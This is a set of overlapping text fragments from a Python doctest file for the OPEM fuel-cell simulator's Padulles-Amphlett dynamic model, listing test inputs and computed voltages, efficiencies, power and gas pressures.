6.068381657907269 V", ": 8.818208962422144 W ########### Report is generating ... Done! 
>>> Padulles_Amphlett_Data[\"Status\"] True >>>", "########### I : 1.7 E : 6.068390890445182 V Eta Activation : 0.3731623911228729 V", ": 0.324807877394268 V PH2 : 0.19707238966150117 atm PH2O : 0.24256210619539273 atm PO2 :", "1.7 E : 6.068390890445182 V Eta Activation : 0.3731623911228729 V Eta Concentration :", "utf-8 -*- ''' >>> from opem.Dynamic.Padulles_Amphlett import * >>> import shutil >>> Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":343,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":0.1,\"i-stop\":4,\"i-step\":0.1,\"Name\":\"Test\"}", ": 0.002113348284589288 V FC Efficiency : 0.5520748042471996 FC Power : 5.1674201677537885 W FC", "6.0683662652154 V Eta Activation : 0.417106024344736 V Eta Concentration : 0.0006569460115677318 V Eta", "E : 6.068390890445182 V Eta Activation : 0.3731623911228729 V Eta Concentration : 0.0003347784463987542", "6.068390890445182 V Eta Activation : 0.3731623911228729 V Eta Concentration : 0.0003347784463987542 V Eta", "Concentration : 0.000494984370825149 V Eta Ohmic : 0.00442164533169592 V FC Efficiency : 0.5192622556245563", "Power-Thermal : 8.818208962422144 W ########### Report is generating ... Done! 
>>> Padulles_Amphlett_Data[\"Status\"] True", "Loss : 0.43396509140262446 V PH2 : 0.19665087821306954 atm PH2O : 0.2420432983355364 atm PO2", ": 9.331810347802308e+270 V FC Efficiency : -5.981929710129684e+270 FC Power : -9.331810347802308e+271 W FC", "2.212579832246212 W ########### I : 1.3 E : 6.068397044188998 V Eta Activation :", ": 6.068360106342617 V Eta Activation : 0.4246884348310017 V Eta Concentration : 0.0007385973342150736 V", "Eta Concentration : 7.809186891953766e-05 V Eta Ohmic : 0.0007026162388380664 V FC Efficiency :", "0.3579405643231677 V PH2 : 0.19700213775342923 atm PH2O : 0.24247563821874998 atm PO2 : 0.19053117457991825", ": 0.0060314264601405215 V FC Efficiency : 0.5050511549266622 FC Power : 13.393956628655083 W FC", "V PH2 : 0.19674923088437024 atm PH2O : 0.2421643535028362 atm PO2 : 0.1903883834923488 atm", "Ohmic : 0.0007026162388380664 V FC Efficiency : 0.5997124668722417 FC Power : 1.8711028966413943 W", "########### I : 0.6 E : 6.0684078107750326 V Eta Activation : 0.3041956781419353 V", "atm PH2O : 0.24230270226546458 atm PO2 : 0.19045184619793523 atm Power-Thermal : 4.761340157365757 W", "I(>0.1) leads to minus amount of V, please check your inputs Done! 
>>>", "4.05024559387154 V Loss : 0.4036265972020676 V PH2 : 0.19683353317405658 atm PH2O : 0.24226811507480747", "V Loss : 0.324807877394268 V PH2 : 0.19707238966150117 atm PH2O : 0.24256210619539273 atm", "W ########### I : 1.8 E : 6.068389351849069 V Eta Activation : 0.3769483587657406", "8.29401625290499 W ########### I : 3.8 E : 6.068358566463993 V Eta Activation :", "PO2 : 0.19054704025631486 atm Power-Thermal : 1.9954235329963377 W ########### I : 1.2 E", "0.002644278024175193 V FC Efficiency : 0.5422224856637728 FC Power : 6.344003082266143 W FC Voltage", "Ohmic : 0.004600031286563196 V FC Efficiency : 0.5174690806642298 FC Power : 10.494272955870581 W", "0.19041218200694368 atm Power-Thermal : 5.992791140958347 W ########### I : 2.9 E : 6.068372423061707", "atm Power-Thermal : 2.3185876665375803e+269 W ########### I : 2.0 E : 6.144553272737403 V", "0.2921240370409447 V Eta Concentration : 9.76794818682758e-05 V Eta Ohmic : 0.0008785557847524419 V FC", ": 0.5646650099463304 FC Power : 3.96394836982324 W FC Voltage : 4.404387077581378 V Loss", "W ########### I : 0.7 E : 6.068406272883388 V Eta Activation : 0.31440243547871893", "########### I : 1.6 E : 6.068392428977227 V Eta Activation : 0.36914696409844006 V", ": 4.489555538987407 V Loss : 0.3157701467791963 V PH2 : 0.19708644004311557 atm PH2O :", "atm PO2 : 0.19056290593271147 atm Power-Thermal : 1.5710516301767605 W ########### I : 1.0", "Activation : 0.36914696409844006 V Eta Concentration : 0.0003148742658730733 V Eta Ohmic : 0.0028214871486926026", "########### I : 0.9 E : 6.068403196908046 V Eta Activation : 0.3310434726426763 V", "I : 2.8 E : 6.068373962362936 V Eta Activation : 0.40621862980268425 V Eta", "2.3 E : 6.068381657907269 V Eta Activation : 0.39318591119501267 V Eta Concentration :", "Eta Ohmic : 0.005314768076451755 V FC Efficiency : 0.5108802815228812 FC Power : 11.95459858763542", "0.5600666527156857 FC Power : 4.368519891182348 W FC Voltage : 4.368519891182348 V Loss :", "FC Voltage : 
4.60290798706484 V Loss : 0.2931002723075654 V PH2 : 0.19711454080634436 atm", "Voltage : 4.60290798706484 V Loss : 0.2931002723075654 V PH2 : 0.19711454080634436 atm PH2O", "Power : 2.724941943281497 W FC Voltage : 4.541569905469162 V Loss : 0.30536758106117423 V", "Padulles_Amphlett_Data[\"VE\"][5] 4.553525621759973 >>> Padulles_Amphlett_Data[\"V0\"] 4.698326931114575 >>> Padulles_Amphlett_Data[\"K\"] -0.24133551559100302 >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod={}, TestMode=True, PrintMode=False) >>>", "E : 6.068373962362936 V Eta Activation : 0.40621862980268425 V Eta Concentration : 0.000555512176140013", "-2.3185876665375803e+269 W FC Voltage : -2.3185876665375803e+270 V Loss : 4.63717533307516e+269 V PH2 :", "V PH2 : 0.19683353317405658 atm PH2O : 0.24226811507480747 atm PO2 : 0.19043598052153862 atm", "I : 2.9 E : 6.068372423061707 V Eta Activation : 0.4085437792118771 V Eta", "Eta Ohmic : 0.006750024222922298 V FC Efficiency : 0.49981193710908595 FC Power : 14.814425815913308", ": 0.0033538152156708046 V FC Efficiency : 0.5316790944492106 FC Power : 7.879484179737301 W FC", ": 0.0005267910327125488 V FC Efficiency : 0.6120471438396443 FC Power : 1.4321903165847678 W FC", "0.3232442167420945 V Eta Concentration : 0.00015659857042988755 V Eta Ohmic : 0.0014070620817435461 V FC", "Eta Activation : 0.4129629601316751 V Eta Concentration : 0.0006162888970501038 V Eta Ohmic :", "Power : 6.344003082266143 W FC Voltage : 4.229335388177429 V Loss : 0.3678117158535559 V", "FC Efficiency : 0.5192622556245563 FC Power : 10.12561398467885 W FC Voltage : 4.05024559387154", "0.24242375743276434 atm PO2 : 0.19050737606532336 atm Power-Thermal : 3.1088387177404826 W ########### I :", "3.1088387177404826 W ########### I : 1.7 E : 6.068390890445182 V Eta Activation :", "-4.665905173901154e+271 V Loss : 9.331810347802308e+270 V PH2 : 0.19690378508212852 atm PH2O : 0.2423545830514502", "PrintMode=False) >>> Padulles_Amphlett_Data[\"Status\"] False >>> 
Vcell_Calc(Enernst=4.5, Loss=0.4, N=4) 2.9 >>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=None)", "V Eta Activation : 0.2921240370409447 V Eta Concentration : 9.76794818682758e-05 V Eta Ohmic", ": 0.23146009851376736 V Eta Concentration : 3.899435456560147e-05 V Eta Ohmic : 0.0003510800160998837 V", "Eta Activation : 0.3731623911228729 V Eta Concentration : 0.0003347784463987542 V Eta Ohmic :", ": 5.1395791003235525 V Loss : 0.18576727978992955 V PH2 : 0.19717074233280188 atm PH2O :", "Voltage : 3.918455976181777 V Loss : 0.4299811339950573 V PH2 : 0.1966789789762983 atm PH2O", ": 0.006929978850845375 V FC Efficiency : 0.49857958703411753 FC Power : 15.166791037577857 W FC", "Voltage : 4.7739677219492265 V Loss : 0.25888894042333943 V PH2 : 0.19714264156957312 atm PH2O", ": 5.853018266659147e-05 V Eta Ohmic : 0.0005267910327125488 V FC Efficiency : 0.6120471438396443 FC", "FC Voltage : 4.404387077581378 V Loss : 0.3328032238653337 V PH2 : 0.19705833927988675 atm", "6.068412424065923 V Eta Activation : 0.2583036192079603 V Eta Concentration : 5.853018266659147e-05 V Eta", "V FC Efficiency : 0.5064475653403494 FC Power : 13.035960331860592 W FC Voltage :", "Eta Activation : 0.9092187394310518 V Eta Concentration : 1.1361117401857817e-07 V Eta Ohmic :", "0.2420432983355364 atm PO2 : 0.19033285362496066 atm Power-Thermal : 8.555574184086693 W ########### I :", "V Eta Activation : 0.38715939375662295 V Eta Concentration : 0.00041466432635066115 V Eta Ohmic", "Eta Ohmic : 0.0008785557847524419 V FC Efficiency : 0.5901164085980564 FC Power : 2.30145399353242", ": 0.387853540075361 V PH2 : 0.19690378508212852 atm PH2O : 0.2423545830514502 atm PO2 :", ": 0.5341016324451575 FC Power : 7.498786919530012 W FC Voltage : 4.165992733072229 V Loss", "0.7735460064675803 W ########### I : 0.6 E : 6.0684078107750326 V Eta Activation :", "0.3960054536369255 V Eta Concentration : 0.00047486339861378836 V Eta Ohmic : 0.004243378155424144 V FC", ": 0.0007385973342150736 V Eta Ohmic : 
0.00657019196303564 V FC Efficiency : 0.50107358791043 FC", "W FC Voltage : 4.165992733072229 V Loss : 0.380479323755368 V PH2 : 0.19693188584535729", "0.4190730008706778 V PH2 : 0.19674923088437024 atm PH2O : 0.2421643535028362 atm PO2 : 0.1903883834923488", "0.5341016324451575 FC Power : 7.498786919530012 W FC Voltage : 4.165992733072229 V Loss :", "6.068383196823811 V Eta Activation : 0.39024111055794025 V Eta Concentration : 0.0004347034505143372 V Eta", "PH2 : 0.1966930293579127 atm PH2O : 0.24209517912152204 atm PO2 : 0.19035665213955555 atm Power-Thermal", "Eta Ohmic : 0.006929978850845375 V FC Efficiency : 0.49857958703411753 FC Power : 15.166791037577857", "0.4107901672807063 V Eta Concentration : 0.0005960022064159204 V Eta Ohmic : 0.005314768076451755 V FC", "Eta Concentration : 0.0005960022064159204 V Eta Ohmic : 0.005314768076451755 V FC Efficiency :", "E : 6.068360106342617 V Eta Activation : 0.4246884348310017 V Eta Concentration : 0.0007385973342150736", "0.3839273955127959 V Eta Concentration : 0.00039465233709598025 V Eta Ohmic : 0.003531492225469087 V FC", "11.227208859041653 W FC Voltage : 4.0097174496577335 V Loss : 0.41173130254104057 V PH2 :", "Activation : 0.42817767789163225 V Eta Concentration : 0.0007795927885366656 V Eta Ohmic : 0.006929978850845375", "12.676756316854359 W FC Voltage : 3.9614863490169867 V Loss : 0.4213762911512418 V PH2 :", "Ohmic : 0.0038871991293599716 V FC Efficiency : 0.5250728373249665 FC Power : 9.010249888496427 W", ": 0.9818326194558784 W FC Voltage : 4.909163097279392 V Loss : 0.23185017288443285 V PH2", ": 0.5140663396997094 FC Power : 11.227208859041653 W FC Voltage : 4.0097174496577335 V Loss", ": 0.4246884348310017 V Eta Concentration : 0.0007385973342150736 V Eta Ohmic : 0.00657019196303564 V", "I : 2.7 E : 6.068375501600038 V Eta Activation : 0.4038089891176398 V Eta", "V PH2 : 0.19710049042472996 atm PH2O : 0.2425966933860498 atm PO2 : 0.1905867044473064 atm", "The value of I(>0.1) leads to minus amount 
of V, please check your", "0.24261398698137834 atm PO2 : 0.1905946372855047 atm Power-Thermal : 0.7735460064675803 W ########### I :", ": 1.8711028966413943 W FC Voltage : 4.677757241603485 V Loss : 0.27813072895256186 V PH2", ": 0.5050511549266622 FC Power : 13.393956628655083 W FC Voltage : 3.9393990084279658 V Loss", "0.4358872495310143 V PH2 : 0.19663682783145514 atm PH2O : 0.24202600474020786 atm PO2 : 0.19032492078676233", "V Eta Concentration : 7.809186891953766e-05 V Eta Ohmic : 0.0007026162388380664 V FC Efficiency", ": 4.761340157365757 W ########### I : 2.4 E : 6.068380118926627 V Eta Activation", ": 6.068358566463993 V Eta Activation : 0.4264559863331208 V Eta Concentration : 0.0007590808465813247 V", "0.41506683170178466 V Eta Concentration : 0.0006366034731784721 V Eta Ohmic : 0.005672855976278701 V FC", "Eta Concentration : 0.0006162888970501038 V Eta Ohmic : 0.0054937518419525275 V FC Efficiency :", "Analyzing . . . I : 0.1 E : 6.0684154992732005 V Eta Activation", ": 0.0007590808465813247 V Eta Ohmic : 0.006750024222922298 V FC Efficiency : 0.49981193710908595 FC", ">>> Padulles_Amphlett_Data[\"PH2\"][5] 0.19710049042472996 >>> Padulles_Amphlett_Data[\"PH2O\"][5] 0.2425966933860498 >>> Padulles_Amphlett_Data[\"Ph\"][5] 0.9650580567185031 >>> Padulles_Amphlett_Data[\"VE\"][5] 4.553525621759973 >>>", "V Eta Activation : 0.3839273955127959 V Eta Concentration : 0.00039465233709598025 V Eta Ohmic", ": 0.35539503345654255 V Eta Concentration : 0.0002553220624997795 V Eta Ohmic : 0.0022902088041253615 V", "Ohmic : 0.0029988129062160497 V FC Efficiency : 0.5366552535984287 FC Power : 7.116048662715165 W", ": 0.40642364231840483 V PH2 : 0.19681948279244216 atm PH2O : 0.2422508214794789 atm PO2 :", "Eta Ohmic : 0.0015834606415773538 V FC Efficiency : 0.5646650099463304 FC Power : 3.96394836982324", ": 0.39456301313781456 V PH2 : 0.19687568431889974 atm PH2O : 0.2423199958607931 atm PO2 :", "Activation : 0.4085437792118771 V Eta Concentration : 
0.0005757433248249061 V Eta Ohmic : 0.005135904406545483", ": 3.3 E : 6.0683662652154 V Eta Activation : 0.417106024344736 V Eta Concentration", "########### I : 3.7 E : 6.068360106342617 V Eta Activation : 0.4246884348310017 V", "value of I(>0.1) leads to minus amount of V, please check your inputs", "atm Power-Thermal : 8.818208962422144 W ########### Report is generating ... Done! >>> Padulles_Amphlett_Data[\"Status\"]", "W ########### I : 1.3 E : 6.068397044188998 V Eta Activation : 0.35539503345654255", "V Eta Concentration : 0.00041466432635066115 V Eta Ohmic : 0.0037092867838082735 V FC Efficiency", "13.393956628655083 W FC Voltage : 3.9393990084279658 V Loss : 0.4257931434330969 V PH2 :", "Ohmic : 0.0010546098289093816 V FC Efficiency : 0.5822525519832258 FC Power : 2.724941943281497 W", "0.0015834606415773538 V FC Efficiency : 0.5646650099463304 FC Power : 3.96394836982324 W FC Voltage", "Ohmic : 0.0012307785370829418 V FC Efficiency : 0.5755840434599239 FC Power : 3.1426888772911847 W", "0.4228725100457559 V Eta Concentration : 0.0007181421727400468 V Eta Ohmic : 0.006390481776561363 V FC", "1.948431634418616e-05 V Eta Ohmic : 0.00017548304819292376 V FC Efficiency : 0.6589203974773784 FC Power", "1.1623111227088154 W ########### I : 0.8 E : 6.068404734927729 V Eta Activation :", ": 6.144553272737403 V Eta Activation : 0.9103753288368093 V Eta Concentration : 2.301179808139826e-06 V", "0.41670093756357396 V PH2 : 0.1967632812659846 atm PH2O : 0.24218164709816473 atm PO2 : 0.19039631633054707", "FC Efficiency : 0.5211232875604884 FC Power : 9.755427943132343 W FC Voltage : 4.06476164297181", "V Eta Activation : 0.3310434726426763 V Eta Concentration : 0.0001762905810800498 V Eta Ohmic", "V FC Efficiency : 0.5600666527156857 FC Power : 4.368519891182348 W FC Voltage :", "Voltage : 4.306183473128157 V Loss : 0.3524430218673324 V PH2 : 0.1970161881350436 atm PH2O", "4.279867176181073 W ########### I : 2.2 E : 6.068383196823811 V Eta Activation :", "FC 
Efficiency : 0.5293741761651032 FC Power : 8.25823714817561 W FC Voltage : 4.129118574087805", "Efficiency : 0.5124481138904448 FC Power : 11.591576336201861 W FC Voltage : 3.997095288345469 V", ": 12.676756316854359 W FC Voltage : 3.9614863490169867 V Loss : 0.4213762911512418 V PH2", "0.19695998660858605 atm PH2O : 0.24242375743276434 atm PO2 : 0.19050737606532336 atm Power-Thermal : 3.1088387177404826", "I : 1.3 E : 6.068397044188998 V Eta Activation : 0.35539503345654255 V Eta", "6.0683708836963435 V Eta Activation : 0.4107901672807063 V Eta Concentration : 0.0005960022064159204 V Eta", "Power-Thermal : 0.24816738054412169 W ########### I : 0.3 E : 6.068412424065923 V Eta", "FC Voltage : 4.253168626404167 V Loss : 0.36304537588899266 V PH2 : 0.19698808737181484 atm", "Ohmic : 0.0019366035503462617 V FC Efficiency : 0.55589469312397 FC Power : 4.769576467003663 W", ": 4.0 E : 6.144553093215826 V Eta Activation : 0.9106431331307118 V Eta Concentration", "of I(>0.1) leads to minus amount of V, please check your inputs Done!", "0.19663682783145514 atm PH2O : 0.24202600474020786 atm PO2 : 0.19032492078676233 atm Power-Thermal : 8.818208962422144", "0.9650580567185031 >>> Padulles_Amphlett_Data[\"VE\"][5] 4.553525621759973 >>> Padulles_Amphlett_Data[\"V0\"] 4.698326931114575 >>> Padulles_Amphlett_Data[\"K\"] -0.24133551559100302 >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod={}, TestMode=True,", "W FC Voltage : 4.129118574087805 V Loss : 0.387853540075361 V PH2 : 0.19690378508212852", "########### I : 1.5 E : 6.068393967445208 V Eta Activation : 0.3648724409731032 V", "PO2 : 0.19060257012370302 atm Power-Thermal : 0.588897103358606 W ########### I : 0.5 E", "0.0014070620817435461 V FC Efficiency : 0.569790429225178 FC Power : 3.555492278365111 W FC Voltage", "0.24230270226546458 atm PO2 : 0.19045184619793523 atm Power-Thermal : 4.761340157365757 W ########### I :", "atm Power-Thermal : 4.761340157365757 W ########### I : 2.4 E : 6.068380118926627 V", 
"Concentration : 3.899435456560147e-05 V Eta Ohmic : 0.0003510800160998837 V FC Efficiency : 0.6293798842665886", ": 0.4129629601316751 V Eta Concentration : 0.0006162888970501038 V Eta Ohmic : 0.0054937518419525275 V", "PH2O : 0.24264857417203542 atm PO2 : 0.1906105029619013 atm Power-Thermal : 0.41280968341523216 W ###########", ": 0.380479323755368 V PH2 : 0.19693188584535729 atm PH2O : 0.24238917024210727 atm PO2 :", "V FC Efficiency : 0.5036913732928463 FC Power : 13.750774490894704 W FC Voltage :", "0.4 E : 6.068410886366294 V Eta Activation : 0.27735002084480426 V Eta Concentration :", "atm PO2 : 0.1906105029619013 atm Power-Thermal : 0.41280968341523216 W ########### I : 0.4", "V FC Efficiency : 0.5316790944492106 FC Power : 7.879484179737301 W FC Voltage :", "13.750774490894704 W FC Voltage : 3.9287927116842014 V Loss : 0.42791409484462756 V PH2 :", ">>> Padulles_Amphlett_Data[\"I\"][5] 0.6 >>> Padulles_Amphlett_Data[\"V\"][5] 4.541569905469162 >>> Padulles_Amphlett_Data[\"EFF\"][5] 0.5822525519832258 >>> Padulles_Amphlett_Data[\"PO2\"][5] 0.1905867044473064 >>>", "V Eta Ohmic : 1.8785852500552963e+271 V FC Efficiency : -1.2042213141380103e+271 FC Power :", "Loss : 0.3328032238653337 V PH2 : 0.19705833927988675 atm PH2O : 0.24254481260006414 atm PO2", ": 0.5293741761651032 FC Power : 8.25823714817561 W FC Voltage : 4.129118574087805 V Loss", "V Eta Ohmic : 0.0014070620817435461 V FC Efficiency : 0.569790429225178 FC Power :", ": 0.1905946372855047 atm Power-Thermal : 0.7735460064675803 W ########### I : 0.6 E :", ": 0.41506683170178466 V Eta Concentration : 0.0006366034731784721 V Eta Ohmic : 0.005672855976278701 V", ": 4.111968011342347 V Loss : 0.3912833448667819 V PH2 : 0.19688973470051413 atm PH2O :", ": 6.068357026521189 V Eta Activation : 0.42817767789163225 V Eta Concentration : 0.0007795927885366656 V", "0.23185017288443285 V PH2 : 0.1971566919511875 atm PH2O : 0.24266586776736396 atm PO2 : 0.1906184358000996", "V Eta Ohmic : 0.0015834606415773538 
V FC Efficiency : 0.5646650099463304 FC Power :", "Power : 11.227208859041653 W FC Voltage : 4.0097174496577335 V Loss : 0.41173130254104057 V", ": 0.1903883834923488 atm Power-Thermal : 6.748686546268298 W ########### I : 3.2 E :", "V Eta Activation : 0.41506683170178466 V Eta Concentration : 0.0006366034731784721 V Eta Ohmic", "atm PO2 : 0.1903883834923488 atm Power-Thermal : 6.748686546268298 W ########### I : 3.2", "0.33802037026202836 V Eta Concentration : 0.0001960088652678871 V Eta Ohmic : 0.0017599744011013664 V FC", "FC Efficiency : 0.6120471438396443 FC Power : 1.4321903165847678 W FC Voltage : 4.7739677219492265", "PO2 : 0.19031698794856405 atm Power-Thermal : 3.757170500110593e+272 W ########### Report is generating ...", "4.368519891182348 V Loss : 0.3399763535283976 V PH2 : 0.19704428889827239 atm PH2O : 0.2425275190047356", "E : 6.0684078107750326 V Eta Activation : 0.3041956781419353 V Eta Concentration : 0.00011729309032954864", "V Loss : 0.397705910482824 V PH2 : 0.19686163393728537 atm PH2O : 0.24230270226546458 atm", "0.24264857417203542 atm PO2 : 0.1906105029619013 atm Power-Thermal : 0.41280968341523216 W ########### I :", "Eta Activation : 0.40130847825734167 V Eta Concentration : 0.0005151327744999589 V Eta Ohmic :", "Efficiency : 0.5755840434599239 FC Power : 3.1426888772911847 W FC Voltage : 4.489555538987407 V", "atm PO2 : 0.1904042491687454 atm Power-Thermal : 6.24342366379814 W ########### I : 3.0", "W FC Voltage : 3.888920778866117 V Loss : 0.4358872495310143 V PH2 : 0.19663682783145514", "Activation : 0.2921240370409447 V Eta Concentration : 9.76794818682758e-05 V Eta Ohmic : 0.0008785557847524419", "FC Power : 11.95459858763542 W FC Voltage : 3.9848661958784737 V Loss : 0.41670093756357396", "3.6 E : 6.068361646157063 V Eta Activation : 0.4228725100457559 V Eta Concentration :", "PH2 : 0.19662277744984075 atm PH2O : 0.24200871114487932 atm PO2 : 0.19031698794856405 atm Power-Thermal", "6.06836472559345 V Eta Activation : 
0.4190844003836543 V Eta Concentration : 0.0006773165893020328 V Eta", "0.1905946372855047 atm Power-Thermal : 0.7735460064675803 W ########### I : 0.6 E : 6.0684078107750326", "V FC Efficiency : 0.5901164085980564 FC Power : 2.30145399353242 W FC Voltage :", "0.19057877160910808 atm Power-Thermal : 1.1623111227088154 W ########### I : 0.8 E : 6.068404734927729", "Power-Thermal : 1.5710516301767605 W ########### I : 1.0 E : 6.068401658824337 V Eta", "6.068406272883388 V Eta Activation : 0.31440243547871893 V Eta Concentration : 0.00013693276339445145 V Eta", "Activation : 0.31440243547871893 V Eta Concentration : 0.00013693276339445145 V Eta Ohmic : 0.0012307785370829418", "0.24245834462342142 atm PO2 : 0.19052324174171997 atm Power-Thermal : 2.6555639230341663 W ########### I :", ": 0.00039465233709598025 V Eta Ohmic : 0.003531492225469087 V FC Efficiency : 0.5293741761651032 FC", "0.00021575349319660598 V Eta Ohmic : 0.0019366035503462617 V FC Efficiency : 0.55589469312397 FC Power", "0.1967913820292134 atm PH2O : 0.2422162342888218 atm PO2 : 0.19041218200694368 atm Power-Thermal : 5.992791140958347", "V Eta Concentration : 0.0004347034505143372 V Eta Ohmic : 0.0038871991293599716 V FC Efficiency", "atm PO2 : 0.19037251781595219 atm Power-Thermal : 7.259039668139408 W ########### I : 3.4", ": 0.19714264156957312 atm PH2O : 0.24264857417203542 atm PO2 : 0.1906105029619013 atm Power-Thermal :", ": 11.95459858763542 W FC Voltage : 3.9848661958784737 V Loss : 0.41670093756357396 V PH2", "Ohmic : 0.0060314264601405215 V FC Efficiency : 0.5050511549266622 FC Power : 13.393956628655083 W", "0.19035665213955555 atm Power-Thermal : 7.774225509105296 W ########### I : 3.6 E : 6.068361646157063", "0.4257931434330969 V PH2 : 0.19670707973952706 atm PH2O : 0.24211247271685057 atm PO2 : 0.19036458497775385", "Voltage : 3.950291009654725 V Loss : 0.42361505111213504 V PH2 : 0.19672113012114145 atm PH2O", "Activation : 0.35009414904739194 V Eta Concentration : 
0.00023552453535116493 V Eta Ohmic : 0.002113348284589288", ": 0.19708644004311557 atm PH2O : 0.24257939979072127 atm PO2 : 0.19057877160910808 atm Power-Thermal :", "0.8 E : 6.068404734927729 V Eta Activation : 0.3232442167420945 V Eta Concentration :", "3.888920778866117 V Loss : 0.4358872495310143 V PH2 : 0.19663682783145514 atm PH2O : 0.24202600474020786", "Efficiency : 0.5997124668722417 FC Power : 1.8711028966413943 W FC Voltage : 4.677757241603485 V", "0.1971566919511875 atm PH2O : 0.24266586776736396 atm PO2 : 0.1906184358000996 atm Power-Thermal : 0.24816738054412169", "PO2 : 0.1906184358000996 atm Power-Thermal : 0.24816738054412169 W ########### I : 0.3 E", ": 0.19038045065415046 atm Power-Thermal : 7.003243683145644 W ########### I : 3.3 E :", "0.19038045065415046 atm Power-Thermal : 7.003243683145644 W ########### I : 3.3 E : 6.0683662652154", ": 0.19707238966150117 atm PH2O : 0.24256210619539273 atm PO2 : 0.1905708387709098 atm Power-Thermal :", "atm Power-Thermal : 5.249386015321152 W ########### I : 2.6 E : 6.068377040773017 V", "Concentration : 9.76794818682758e-05 V Eta Ohmic : 0.0008785557847524419 V FC Efficiency : 0.5901164085980564", "FC Voltage : 4.541569905469162 V Loss : 0.30536758106117423 V PH2 : 0.19710049042472996 atm", "0.25888894042333943 V PH2 : 0.19714264156957312 atm PH2O : 0.24264857417203542 atm PO2 : 0.1906105029619013", "E : 6.068397044188998 V Eta Activation : 0.35539503345654255 V Eta Concentration : 0.0002553220624997795", ": 5.992791140958347 W ########### I : 2.9 E : 6.068372423061707 V Eta Activation", "4.253168626404167 V Loss : 0.36304537588899266 V PH2 : 0.19698808737181484 atm PH2O : 0.24245834462342142", "Efficiency : 0.49981193710908595 FC Power : 14.814425815913308 W FC Voltage : 3.8985331094508706 V", "V Loss : 0.3678117158535559 V PH2 : 0.19697403699020044 atm PH2O : 0.24244105102809288 atm", ": 0.19665087821306954 atm PH2O : 0.2420432983355364 atm PO2 : 0.19033285362496066 atm Power-Thermal :", 
"0.2425966933860498 atm PO2 : 0.1905867044473064 atm Power-Thermal : 0.9650580567185031 W ########### I :", ": 4.63717533307516e+269 V PH2 : 0.19717074233280188 atm PH2O : 0.2426831613626925 atm PO2 :", "Power-Thermal : 3.1088387177404826 W ########### I : 1.7 E : 6.068390890445182 V Eta", ": 3.555492278365111 W FC Voltage : 4.4443653479563885 V Loss : 0.324807877394268 V PH2", "Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod={}, TestMode=True, PrintMode=False) >>> Padulles_Amphlett_Data[\"Status\"] False >>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=4) 2.9 >>> Vcell_Calc(Enernst=4.5,", ": -1.2042213141380103e+271 FC Power : -3.757170500110593e+272 W FC Voltage : -9.392926250276482e+271 V Loss", ": 9.755427943132343 W FC Voltage : 4.06476164297181 V Loss : 0.40072369519096346 V PH2", "FC Power : 14.814425815913308 W FC Voltage : 3.8985331094508706 V Loss : 0.43396509140262446", "PO2 : 0.1904280476833403 atm Power-Thermal : 5.495727044129421 W ########### I : 2.7 E", "Power-Thermal : 4.519750111503576 W ########### I : 2.3 E : 6.068381657907269 V Eta", ": 0.19047564471253012 atm Power-Thermal : 9.331810347802308e+271 W ########### I : 4.0 E :", "PO2 : 0.19033285362496066 atm Power-Thermal : 8.555574184086693 W ########### I : 3.9 E", "########### I : 3.8 E : 6.068358566463993 V Eta Activation : 0.4264559863331208 V", "FC Efficiency : 0.6589203974773784 FC Power : 0.5139579100323552 W FC Voltage : 5.1395791003235525", "E : 6.068409348602667 V Eta Activation : 0.2921240370409447 V Eta Concentration : 9.76794818682758e-05", ": 6.068392428977227 V Eta Activation : 0.36914696409844006 V Eta Concentration : 0.0003148742658730733 V", "0.19672113012114145 atm PH2O : 0.2421297663121791 atm PO2 : 0.19037251781595219 atm Power-Thermal : 7.259039668139408", ": -4.665905173901154e+271 V Loss : 9.331810347802308e+270 V PH2 : 0.19690378508212852 atm PH2O :", "2.8809969177338575 W ########### I : 1.6 E : 6.068392428977227 V Eta Activation :", "V Loss : 0.42791409484462756 V PH2 : 
0.1966930293579127 atm PH2O : 0.24209517912152204 atm", "I : 3.9 E : 6.068357026521189 V Eta Activation : 0.42817767789163225 V Eta", "########### I : 2.0 E : 6.144553272737403 V Eta Activation : 0.9103753288368093 V", ": 6.068363185907339 V Eta Activation : 0.42100548618901656 V Eta Concentration : 0.0006977152837847073 V", "atm Power-Thermal : 5.495727044129421 W ########### I : 2.7 E : 6.068375501600038 V", "Voltage : 4.206975801412199 V Loss : 0.37228332551300575 V PH2 : 0.19695998660858605 atm PH2O", "Concentration : 0.0007181421727400468 V Eta Ohmic : 0.006390481776561363 V FC Efficiency : 0.5023661507925354", ": 6.24342366379814 W ########### I : 3.0 E : 6.0683708836963435 V Eta Activation", "Power : 15.166791037577857 W FC Voltage : 3.888920778866117 V Loss : 0.4358872495310143 V", "V Loss : 0.3399763535283976 V PH2 : 0.19704428889827239 atm PH2O : 0.2425275190047356 atm", "atm Power-Thermal : 0.1010420899676448 W ########### I : 0.2 E : 6.068413961701556 V", ": 0.19057877160910808 atm Power-Thermal : 1.1623111227088154 W ########### I : 0.8 E :", "FC Voltage : 3.9393990084279658 V Loss : 0.4257931434330969 V PH2 : 0.19670707973952706 atm", "V Eta Activation : 0.3731623911228729 V Eta Concentration : 0.0003347784463987542 V Eta Ohmic", "6.068378579881878 V Eta Activation : 0.39870996749954657 V Eta Concentration : 0.000494984370825149 V Eta", ": 0.2 E : 6.068413961701556 V Eta Activation : 0.23146009851376736 V Eta Concentration", ": 2.0 E : 6.0683862744646095 V Eta Activation : 0.3839273955127959 V Eta Concentration", "3.2 E : 6.068367804773196 V Eta Activation : 0.41506683170178466 V Eta Concentration :", "########### I : 2.1 E : 6.068384735676256 V Eta Activation : 0.38715939375662295 V", "V PH2 : 0.197030238516658 atm PH2O : 0.24251022540940706 atm PO2 : 0.19054704025631486 atm", "FC Efficiency : 0.5050511549266622 FC Power : 13.393956628655083 W FC Voltage : 3.9393990084279658", "W FC Voltage : 4.079852105493149 V Loss : 0.397705910482824 V PH2 : 
